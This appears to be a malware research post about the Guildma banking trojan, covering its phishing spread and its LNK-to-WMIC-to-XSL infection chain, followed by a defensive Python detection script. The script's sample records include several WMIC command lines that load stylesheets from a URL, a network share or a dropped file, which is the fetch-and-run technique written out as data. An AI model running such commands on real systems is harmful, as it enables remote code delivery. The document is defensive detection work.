For several months now, we have been tracking malware called Guildma. Guildma is a powerful combination of a RAT (remote access tool), spyware, password stealer and banker malware, mainly distributed via malicious attachments in phishing email campaigns. The cybercriminals behind Guildma have primarily focused on targeting Brazilian users and services, but since May 2019 they have expanded their target pool and are now targeting more than 130 banks and 75 other web services around the world.

We estimate that the first versions of Guildma were created in 2015, based on the available clues in our analysis and previous research conducted on Guildma. Malware researchers have analyzed Guildma in the past, but only focused on the first stages of the malware. Our analysis provides detailed information about all of Guildma’s stages, module functionality, C&C servers, commands and a long list of targeted services and applications, as well as a description of how its features have evolved.

During Guildma’s long existence, its authors have used a large number of domains, various infection and stealing techniques, and several programming languages (Delphi, JS, VBS). On the other hand, they have also reused the same or very similar code patterns, such as the encryption algorithm and its seeds, the URL path format, and variable or file names. With these patterns, we have been able to track the entire campaign with high accuracy, even when parts of the malware or its modules have changed.

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages, containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool (WMIC) and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first-stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening the webpage of one of the targeted banks.

Originally, the campaign targeted Brazilian users and services by spreading tailored phishing emails. However, this year we have protected more than 26,000 Avast users globally from 155,000 Guildma infection attempts.
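The LNK to WMIC to XSL chain described above is visible in process-creation telemetry, because a user-opened LNK that launches WMIC shows up as wmic.exe spawned by the desktop shell with a stylesheet argument. The following detection script is an added example, not code from Avast or from the Guildma authors. The post only says that the LNK abuses WMIC to fetch an XSL file; the exact command-line shape assumed here (a `/format:` argument pointing at a URL, UNC path or local .xsl file) is the common form of that technique and is an assumption, as are the Sysmon-style field names and the constructed sample records.

```python
import re

# Constructed sample process-creation records in a Sysmon Event ID 1 style.
# These are not real Guildma telemetry and the field names are an assumption;
# map them onto whatever schema your EDR or SIEM actually emits.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"https://example.invalid/update/fat.xsl"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process list brief /format:list"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"WMIC.exe computersystem get /FORMAT:\\10.0.0.5\share\report.xsl"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic /format:C:\Users\Public\stage.xsl"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe invoice.txt"},
]

# /format: accepts a built-in name (csv, list, xml, ...), a local path, or a URL/UNC path.
# WMIC resolves the last two to an XSL stylesheet and runs any script it embeds,
# which is the behaviour the LNK stage abuses to pull down the first-stage XSL.
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)
REMOTE_SOURCE = re.compile(r'^(https?://|ftp://|\\\\)', re.IGNORECASE)
# Stylesheets WMIC ships with live here; anything else on disk is attacker-supplied input.
TRUSTED_XSL_DIR = "c:\\windows\\system32\\wbem\\"


def classify_event(event):
    """Return 'high', 'medium' or None for one process-creation record."""
    if not event["Image"].lower().endswith("\\wmic.exe"):
        return None
    match = FORMAT_ARG.search(event["CommandLine"])
    if not match:
        return None
    target = match.group(1)
    if REMOTE_SOURCE.match(target):
        return "high"  # stylesheet fetched over the network: the LNK -> WMIC -> XSL pattern
    if target.lower().endswith(".xsl") and not target.lower().startswith(TRUSTED_XSL_DIR):
        return "medium"  # custom local stylesheet, e.g. one dropped by an earlier stage
    return None  # a built-in format name such as /format:list


def shell_launched(event):
    """True when WMIC's parent is the desktop shell, as happens when a user opens a LNK."""
    return event["ParentImage"].lower().endswith("\\explorer.exe")


def flag_events(events):
    """Indexes of records worth an analyst's attention, in log order."""
    return [i for i, ev in enumerate(events) if classify_event(ev) is not None]


if __name__ == "__main__":
    for i in flag_events(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        origin = "from-shell" if shell_launched(ev) else "from-other-process"
        print(i, classify_event(ev), origin, ev["CommandLine"])
```

The remote case is rated high on its own because there is no legitimate reason for WMIC on a workstation to render output through a stylesheet hosted on a web server or file share; the parent-process check is kept separate so it can be used as a second signal (a LNK opened from Explorer gives explorer.exe as parent) without suppressing hits launched from cmd.exe or a script host.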